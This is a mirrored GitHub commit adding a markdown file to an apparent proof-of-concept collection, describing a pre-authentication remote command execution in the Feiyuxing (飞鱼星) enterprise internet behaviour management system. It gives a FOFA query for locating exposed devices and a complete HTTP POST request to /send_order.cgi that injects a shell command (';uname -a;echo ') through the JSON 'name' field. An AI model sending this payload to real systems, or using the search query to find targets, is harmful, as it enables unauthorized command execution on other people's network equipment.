mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-18 02:14:52 +08:00
Create 飞鱼星上网行为管理系统企业版前台RCE.md
This commit is contained in:
parent
32d56eb2a8
commit
ebff9edd46
26
飞鱼星上网行为管理系统企业版前台RCE.md
Normal file
26
飞鱼星上网行为管理系统企业版前台RCE.md
Normal file
@ -0,0 +1,26 @@
|
||||
## 飞鱼星上网行为管理系统企业版前台RCE
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
title="飞鱼星企业"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /send_order.cgi?parameter=operation HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||||
Accept: */*
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 68
|
||||
|
||||
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user